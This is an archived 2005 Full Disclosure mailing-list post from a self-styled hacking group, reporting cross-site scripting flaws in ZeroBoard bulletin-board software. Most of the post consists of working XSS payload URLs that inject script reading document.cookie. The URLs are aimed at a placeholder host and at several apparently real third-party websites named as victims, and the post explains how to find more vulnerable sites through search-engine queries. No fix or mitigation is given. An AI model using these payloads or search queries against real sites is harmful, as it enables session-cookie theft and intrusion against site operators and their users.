Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Multiples vulnerability in ZeroBoard,

Multiples vulnerability in ZeroBoard,

From: albanian haxorz <asc_at_albanianhaxorz.org>
Date: Sat, 19 Feb 2005 19:32:08 +0100

".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-
*'^'~*-,._."
".,-*-
,._
                    -.,-*-,."
".,-*-,._ ALBANIA SECURITY
CLAN -.,-*-,."
".,-*-
,._
                    -.,-*-,."
".,-*-
,._ ...::www.albanianhaxorz.org::...
      -.,-*-,."
".,-*-,.-
                                                                       
                 -.,-*-,."
".,-*-,.- PROUD TO BE
ALBANIAN -.,-*-,."
".,-*-
,._
                   -.,-*-,."
".,-*-,._ Long Live Ethnic
Albania -.,-*-,."
".,-*-
,._
                   -.,-*-,."
".,-*-,._ Copyright (c) 2005 ASC irc.gigachat.net #ASC -
.,-*-,."
".,-*-
,._
                   -.,-*-,."
".,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-*'^'~*-,._.,-
*'^'~*-,._."

Multiples vulnerability in ZeroBoard,

* Exploits *:

http://victime.al/dir/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E
(Cross Site Scripting and XSS for found websites with this bugs >>>
www.google.com // */zboard.php?id=gallery )

>>> http://www.edu-sky.co.kr/board/zboard.php?id=gallery&sn1=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

|

http://victime.al/bbs or zboard/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E
(Path disclosure and Cross Site Scripting and XSS )

>>> http://union.snu.ac.kr/bbs/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

|

http://victime.al/bbs or zboard/skin/dir/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E
( Cross Site Scripting and XSS for found websites with this bugs >>>
www.google.com // */zboard/skin/***/view_image.php? )

>>> http://mytheme.net/zboard/skin/nzeo4_pds/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

|

http://victim.al/bbs or zboard/zboard.php?id=link&page=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
( Cross Site Scripting edhe XSS for found websites with this bugs >>>
www.google.com // */***/zboard.php?id=link&page= )

>>> http://jina1110.oolim.net/zboard/bbs/zboard.php?
id=link&page=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

* Vendor *

http://www.zeroboard.com/

www.albanianhaxorz.org | irc.gigachat.net -j #ASC
ALBANIA SECURITY CLAN, ALBANIAN RULEZZZ.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Feb 20 2005

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]